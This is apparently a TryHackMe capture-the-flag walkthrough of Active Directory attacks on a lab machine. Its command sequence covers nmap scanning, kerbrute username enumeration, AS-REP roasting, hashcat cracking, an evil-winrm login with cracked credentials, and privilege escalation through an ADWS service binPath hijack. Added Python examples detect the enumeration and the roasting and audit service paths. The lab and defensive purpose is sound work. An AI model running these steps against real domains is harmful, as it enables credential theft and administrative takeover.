"Services" TryHackMe Write‐up - CTF-Walkthroughs/CTF-Walkthroughs-Wiki GitHub Wiki
This is the writeup for the Services CTF challenge on TryHackMe! https://tryhackme.com/room/services
tags: enumerate, hash cracking, exploit, brute-force, kerbrute
Highlight: Enumerating Active Directory users with kerbrute, then capturing a password hash with AS-REP roasting.
First let's kick things off with some classic nmap scans to get a lay of the land.
INITIAL SETUP:
export IP=10.10.117.221
export myIP=10.13.24.71
sudo nmap -v --min-rate 10000 $IP -p- | grep open | tee tmp
We can use a quick sed/awk pipeline to pull the open port numbers out of the saved nmap output as a comma-separated list for the script scan (the trailing sed strips the final comma so nmap accepts the list):
cat tmp | sed 's/\// /g' | awk '{print $1}' | tr "\n" "," | sed 's/,$//'
We'll follow up now with a full scan:
sudo nmap -v -sVC -oN nmap.txt $IP -p <ports>
SMB ENUMERATION (anonymous):
smbclient -L //$IP/
smbmap -u 'anonymous' -H $IP
ENUMERATION:
Walk the port 80 website. We quickly identify some employee names from the staff listed on the site.
And here is a naming convention, revealed by the contact email:
Using the naming convention from the contact email, we can compile a shortlist now of possible usernames.
Next, we'll move on to active directory username enumeration.
kerbrute userenum --dc $IP -d services.local users.txt
We found some valid users!
AS-REP ROASTING WITH GetNPUsers.py:
GetNPUsers.py -dc-ip $IP -request 'services.local/' -usersfile users.txt -format hashcat
Boom Shack-a-lacka! j.rock hash is revealed!
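The two Kerberos steps above (kerbrute userenum, then GetNPUsers.py) both leave a recognisable trace in the domain controller's Security log, Event ID 4768 (a TGT was requested). The following Python is an added example, not part of the write-up or of TryHackMe's material: it runs over a constructed list of 4768-style records and flags (a) a burst of "client principal unknown" failures (status 0x6) from one source, the signature of username guessing, and (b) a successful TGT request with pre-authentication type 0 and RC4 (0x17) encryption, the shape of an AS-REP roast. The record field names, IPs, timestamps and usernames are simplified, hand-made sample data, not a parser for real EVTX files.

```python
"""Detect Kerberos username enumeration and AS-REP roasting in 4768 events.

Added example (not from the write-up). EVENTS is a constructed sample; the
field names are assumptions that mirror Event ID 4768's fields loosely:
  status  - Result Code (0x0 success, 0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN)
  preauth - Pre-Authentication Type (0 = none, 2 = PA-ENC-TIMESTAMP)
  etype   - Ticket Encryption Type (0x17 = RC4-HMAC, 0x12 = AES256)
"""
from collections import defaultdict
from datetime import datetime, timedelta


def ev(time, user, ip, status, preauth, etype):
    return {"time": time, "user": user, "ip": ip,
            "status": status, "preauth": preauth, "etype": etype}


# Constructed sample log. IPs and names are made up for the example.
EVENTS = [
    # Username guessing: one AS-REQ per candidate name, unknown names fail 0x6.
    ev("2024-01-01T10:00:00", "a.smith",  "10.13.24.71", "0x6", 2, "0x12"),
    ev("2024-01-01T10:00:01", "b.smith",  "10.13.24.71", "0x6", 2, "0x12"),
    ev("2024-01-01T10:00:02", "c.smith",  "10.13.24.71", "0x6", 2, "0x12"),
    ev("2024-01-01T10:00:03", "d.smith",  "10.13.24.71", "0x6", 2, "0x12"),
    ev("2024-01-01T10:00:04", "e.smith",  "10.13.24.71", "0x6", 2, "0x12"),
    ev("2024-01-01T10:00:05", "f.smith",  "10.13.24.71", "0x6", 2, "0x12"),
    # AS-REP roast: success with NO pre-auth and an RC4-encrypted reply,
    # which is exactly the blob hashcat mode 18200 cracks offline.
    ev("2024-01-01T10:05:00", "j.rock",   "10.13.24.71", "0x0", 0, "0x17"),
    # Normal logons for contrast: pre-auth present, AES, and one lone typo.
    ev("2024-01-01T10:06:00", "b.jones",  "10.10.5.20",  "0x0", 2, "0x12"),
    ev("2024-01-01T10:30:00", "b.jonse",  "10.10.5.20",  "0x6", 2, "0x12"),
]


def find_asrep_roasting(events):
    """Return sorted (user, ip) pairs for successful TGT requests that skipped
    pre-authentication and were answered with RC4. Accounts showing up here
    have 'Do not require Kerberos preauthentication' set and should lose it."""
    return sorted({(e["user"], e["ip"]) for e in events
                   if e["status"] == "0x0" and e["preauth"] == 0
                   and e["etype"] == "0x17"})


def find_user_enumeration(events, threshold=5, window=timedelta(minutes=2)):
    """Return {ip: distinct_unknown_names} for sources that produced at least
    `threshold` 0x6 failures for different usernames inside `window`.
    A sliding window over the time-sorted failures per IP keeps a single
    mistyped username (like b.jonse above) from firing the alert."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == "0x6":
            by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"]))
    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            names = {u for t, u in hits[i:] if t - t0 <= window}
            if len(names) >= threshold:
                flagged[ip] = len(names)
                break
    return flagged


if __name__ == "__main__":
    print("AS-REP roastable accounts seen:", find_asrep_roasting(EVENTS))
    print("Username enumeration sources:", find_user_enumeration(EVENTS))
```

The fix on the defensive side is the same for both findings: clear the "Do not require Kerberos preauthentication" flag on any account that appears in the first list, and treat a burst of 0x6 failures from one host as a signal worth an alert rather than noise.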
Use hashcat to crack the hash: `hashcat -m 18200 hash.txt rockyou.txt`
Bingo! We are in business. Let's log in next with evil-winrm using our newly found creds: j.rock:Serviceworks1
evil-winrm -i $IP -u j.rock -p Serviceworks1
whoami /all
We see that j.rock is in the
Next, let's check services:
services
Our privesc path forward will be binPath hijacking of the ADWS service (sc.exe needs the space after `binPath=`):
sc.exe config ADWS binPath= "net localgroup administrators j.rock /add"
Start and stop the service.
Log out and back in.
net user administrator hellothisisatest123!
Log out and back in as administrator.
Grab the root flag!
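The privesc above works because a low-privileged user was allowed to rewrite a service's binary path, so the service account ran `net localgroup administrators j.rock /add` on the next start. As an added example (not from the write-up or from TryHackMe), here is a small baseline audit a defender can run over service configuration snapshots: it diffs each service's current binPath against a saved baseline and flags paths that changed, that do not start with an executable, that look like a shell or `net` command, or that live in a user-writable directory. Both the baseline and the "current" snapshot are constructed dictionaries here; on a real host they would come from `Get-CimInstance Win32_Service` or `sc.exe qc`, and the ADWS path is a sample value, not something taken from the room.

```python
"""Audit Windows service binPath values against a baseline.

Added example (not from the write-up). BASELINE and CURRENT are constructed
snapshots of {service name: binPath}; the ADWS and Updater entries are sample
values made up for the example.
"""
import re

BASELINE = {
    "ADWS": "C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe",
    "Spooler": "C:\\Windows\\System32\\spoolsv.exe",
    "wuauserv": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p",
}

CURRENT = {
    # Hijacked exactly as in the write-up: the service now runs a command.
    "ADWS": "net localgroup administrators j.rock /add",
    "Spooler": "C:\\Windows\\System32\\spoolsv.exe",
    "wuauserv": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p",
    # A service that never appeared in the baseline, installed from a user dir.
    "Updater": "C:\\Users\\Public\\update.exe",
}

# Phrases that mean "run an admin command", not "start a long-lived daemon".
SUSPICIOUS = re.compile(r"\b(net\s+(user|localgroup)|cmd(\.exe)?\s+/c|powershell)\b", re.I)

# Directories a non-admin can normally write to; a service binary there is a
# weak spot even when the path itself has not changed.
USER_WRITABLE = ("c:\\users\\", "c:\\temp\\", "c:\\programdata\\")


def first_token(binpath):
    """Return the executable portion of a binPath, honouring a quoted path
    (services with spaces in their path are stored as "C:\\Program Files\\...")."""
    s = binpath.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def classify(name, binpath, baseline):
    """Return the list of reasons this service entry deserves a look
    (empty list means it matches the baseline and looks like a real binary)."""
    reasons = []
    if name not in baseline:
        reasons.append("not in baseline")
    elif baseline[name] != binpath:
        reasons.append("binPath changed")
    exe = first_token(binpath)
    if not exe.lower().endswith(".exe"):
        reasons.append("does not start with an .exe")
    if SUSPICIOUS.search(binpath):
        reasons.append("command-like binPath")
    if exe.lower().startswith(USER_WRITABLE):
        reasons.append("executable in user-writable location")
    return reasons


def audit(current, baseline):
    """Map service name -> reasons for every service that raised at least one."""
    return {n: r for n, bp in current.items() if (r := classify(n, bp, baseline))}


if __name__ == "__main__":
    for service, reasons in audit(CURRENT, BASELINE).items():
        print(f"{service}: {', '.join(reasons)}")
```

The audit only catches the symptom; the root cause is the service's DACL. `sc.exe sdshow ADWS` prints the security descriptor, and any non-administrator group holding the change-config right (DC in the SDDL) is what should actually be removed.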